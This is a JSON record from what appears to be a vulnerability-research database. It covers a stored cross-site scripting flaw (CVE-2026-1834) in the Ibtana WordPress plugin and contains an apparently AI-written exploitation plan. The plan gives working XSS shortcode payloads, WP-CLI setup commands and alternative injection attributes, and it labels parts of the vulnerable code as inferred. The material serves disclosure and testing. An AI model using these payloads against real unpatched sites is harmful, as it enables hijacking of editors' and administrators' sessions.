[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvMnC05q6ILa1EAhGOuXV9y7RY5MwXG81hZSSNV6OXP0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2026-1834","ibtana-wordpress-website-builder-authenticated-contributor-stored-cross-site-scripting-via-shortcode-3","Ibtana - WordPress Website Builder \u003C= 1.2.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The Ibtana – WordPress Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ive' shortcode in all versions up to, and including, 1.2.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","ibtana-visual-editor",null,"\u003C=1.2.5.7","1.2.5.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)","2026-03-30 16:30:19","2026-03-31 05:28:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb6a54d91-da79-43a3-affd-e8026e342d95?source=api-prod",1,[22,23,24],"ive-countdown.php","plugin.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-1834 (Ibtana Visual Editor Stored XSS)\n\n## 1. Vulnerability Summary\nThe **Ibtana – WordPress Website Builder** plugin (up to 1.2.5.7) contains a Stored Cross-Site Scripting (XSS) vulnerability via the `[ive]` shortcode. The root cause is the failure to sanitize or escape user-supplied attributes within the `ive_shortcode` function (and its associated rendering callbacks) in `ive-countdown.php`. When a user with at least Contributor-level permissions embeds the `[ive]` shortcode with malicious attributes, the script is stored in the post content and executed in the context of any user (including Administrators) who views the post.\n\n## 2. Attack Vector Analysis\n- **Shortcode:** `[ive]`\n- **Vulnerable Attributes:** Likely `id`, `style`, `launchtarget`, or label attributes (`yearlabel`, `monthlabel`, etc.) as defined in `WP_Ivecountdown::register_ive_block`.\n- **Authentication:** Contributor or higher.\n- **Preconditions:** The plugin must be active. A post or page must be created containing the malicious shortcode.\n- **Endpoint:** Post\u002FPage creation\u002Fupdate (via WordPress admin or REST API).\n- **Trigger:** Viewing the published or previewed post on the frontend.\n\n## 3. Code Flow\n1.  
**Registration:** In `ive-countdown.php`, the `__construct` method of `WP_Ivecountdown` registers the shortcode:\n    `add_shortcode('ive', array( $this, 'ive_shortcode') );`\n2.  **Shortcode Handling:** When WordPress parses `[ive]`, it calls the `ive_shortcode` method.\n3.  **Attribute Extraction:** The method uses `shortcode_atts()` to merge user-supplied attributes with defaults:\n    ```php\n    \u002F\u002F Inferred from register_block_type attributes in source:\n    'id' => array ('type' => 'string'),\n    'style' => array ('type' => 'string', 'default' => 'suzuki'),\n    'launchtarget' => array ('type' => 'string'),\n    'yearlabel' => array ('type' => 'string', 'default' => $this->options['yearlabel']),\n    ```\n4.  **Rendering (The Sink):** The attributes are used to build an HTML string. The vulnerability exists because the code likely concatenates these attributes directly into HTML tags without using `esc_attr()` or `esc_html()`.\n    - **Example Sink (Inferred):** `return '\u003Cdiv id=\"' . $atts['id'] . '\" class=\"' . $atts['style'] . '\">...\u003C\u002Fdiv>';`\n\n## 4. Nonce Acquisition Strategy\nSince the goal is to demonstrate **Stored XSS** via a shortcode, and the attacker is \"Authenticated (Contributor+)\", we can use **WP-CLI** to set up the payload. This bypasses the need to acquire a nonce for the HTTP request to save the post, focusing the PoC on the execution of the stored script.\n\nIf we were to perform the storage via the REST API or `admin-ajax.php`, we would:\n1.  Login as a Contributor.\n2.  Navigate to `wp-admin\u002Fpost-new.php`.\n3.  Extract the `_wpnonce` or `wpRestNonce` from the localized script data: `window.wpApiSettings.nonce`.\n\n**However**, for this specific exploit, we will use WP-CLI to inject the payload and then use the browser to verify the execution. Caveat: WP-CLI does not exercise the Contributor's real path. It skips the `publish_posts` capability check (a Contributor can only submit a post for review, not publish it, so the realistic victim is an Editor or Administrator previewing the pending post) and, depending on the CLI user context, may also skip the `wp_kses_post` content filtering that strips raw `\u003Cscript>` tags from users without the `unfiltered_html` capability. To actually support the \"Contributor+\" claim, the payload must also be saved through the editor or the REST API while logged in as the Contributor; this is why the attribute-breakout \u002F event-handler form in Section 6 (no literal tag for kses to strip) is the more realistic payload, and a browser dialog firing is stronger evidence than the tag appearing in the response body.\n\n## 5. Exploitation Strategy\n1.  **Initialize Environment:** Create a Contributor user and the target post using WP-CLI.\n2.  
**Payload Selection:** We will target the `id` attribute to break out of the HTML attribute context.\n    - **Payload:** `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    - **Shortcode:** `[ive id='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n3.  **Inject Payload:** Update a post with the shortcode.\n4.  **Trigger XSS:** Navigate to the post URL.\n5.  **Observe Execution:** Verify that the `\u003Cscript>` tag is rendered unescaped in the HTML source.\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Post Creation:**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Countdown Test\" --post_author=attacker --post_content=\"[ive id='\\\" onmouseover=\\\"alert(1)\\\" style=\\\"display:block;width:100px;height:100px;background:red;\\\"' style='suzuki']\"\n    ```\n    *Note: Using `onmouseover` or `id='\">\u003Cscript>...'` depending on how the plugin wraps the attribute.*\n\n## 7. Expected Results\n- When viewing the post HTML source, the attribute should appear as:\n  `\u003Cdiv id=\"\" onmouseover=\"alert(1)\" style=\"display:block;...\" ...>`\n  OR\n  `\u003Cdiv id=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" ...>`\n- The `http_request` or `browser_navigate` should show the payload firing or the raw script tag in the response body.\n\n## 8. Verification Steps\n1.  **Check HTML Source:**\n    ```bash\n    # Use the browser_navigate and browser_eval to check for the presence of the script\n    # Or check if a specific element added by the script exists.\n    ```\n2.  **WP-CLI Verification:**\n    ```bash\n    wp post get \u003CPOST_ID> --field=post_content\n    ```\n    Confirm the content still contains the raw, unescaped payload.\n\n## 9. 
Alternative Approaches\nIf the `id` attribute is partially sanitized, try the following attributes based on the `register_ive_block` list in `ive-countdown.php`:\n- **Label attributes:** `[ive yearlabel='\u003C\u002Fp>\u003Cscript>alert(1)\u003C\u002Fscript>\u003Cp>']`\n- **Style attribute:** `[ive style='\">\u003Cimg src=x onerror=alert(1)>']`\n- **Launch Target:** `[ive launchtarget='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\nIf the shortcode requires specific timing attributes to render, add `timestr`:\n`[ive id='\">\u003Cscript>alert(1)\u003C\u002Fscript>' timestr='2028-01-01 00:00:00']`","gemini-3-flash-preview","2026-04-17 22:11:10","2026-04-17 22:11:38",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","1.2.5.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fibtana-visual-editor\u002Ftags\u002F1.2.5.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fibtana-visual-editor.1.2.5.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fibtana-visual-editor\u002Ftags\u002F1.2.5.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fibtana-visual-editor.1.2.5.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fibtana-visual-editor\u002Ftags"]